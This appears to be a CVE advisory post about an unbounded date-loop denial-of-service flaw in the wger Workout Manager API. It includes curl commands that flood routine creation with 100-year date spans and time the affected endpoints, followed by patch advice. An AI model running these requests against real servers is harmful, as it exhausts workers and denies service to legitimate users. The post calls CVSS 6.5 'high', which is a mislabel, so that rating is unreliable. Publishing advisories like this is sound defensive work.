Listen to this Post
How the CVE works (technical details):
The Routine model (wger/manager/models/routine.py) defines start/end date fields without maximum duration validation. The `clean()` method only checks start ≤ end. The RoutineSerializer (wger/manager/api/serializers.py) also lacks delta validation. The `date_sequence` property (line 256) uses an unbounded while loop: while current_date <= self.end:. For a 100-year routine (2000-01-01 to 2099-12-31), the loop iterates 36,525 times. Each iteration performs O(slots × entries × configs) work including building day structures, slots, logs, and progression configs. Five endpoints trigger this: /date-sequence-display/, /date-sequence-gym/, /structure/, /logs/, /stats/. An authenticated attacker posts a routine with extreme dates, adds one day, then GETs any endpoint. The server computes every day in the range, consuming CPU for seconds and returning huge JSON (36,525 entries). Repeated requests exhaust worker threads, causing denial of service. No permission beyond login required. Cache bypass: first request or after TTL expiry always runs full loop. CVSS 6.5 (high) – CWE-400.
dailycve form:
Platform: wger Workout Manager
Version: All before fix
Vulnerability: Unbounded date iteration
Severity: High
date: 2026-05-13
Prediction: Patch within 14 days
What Undercode Say:
Simulate attack impact on server
for i in {1..10}; do
curl -X POST http://target/api/v2/routine/ \
-H "Authorization: Token $TOKEN" \
-d '{"name":"dos","start":"2000-01-01","end":"2099-12-31"}' &
done
Monitor worker threads exhaustion
watch -n 1 'ps aux | grep gunicorn | wc -l'
Test endpoint response time
time curl http://target/api/v2/routine/6/date-sequence-display/ \
-H "Authorization: Token $TOKEN"
Exploit:
Create routine with 100-year span → add one day → GET any of five endpoints. Single request yields 36k+ entries and 3+ seconds CPU. Concurrent requests (e.g., 20 threads) saturate gunicorn/WSGI workers, rejecting legitimate requests.
Protection from this CVE:
Add max duration validation in Routine.clean(): if (end-start).days > 365: raise ValidationError. Same check in RoutineSerializer. Cap `date_sequence` loop to 400 days as defense-in-depth. Deploy rate limiting per user on affected endpoints.
Impact:
Worker thread exhaustion (DoS), amplification with slots/exercises (minutes per request), no privilege escalation needed, five attack vectors, cache bypassable via new routine creation.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

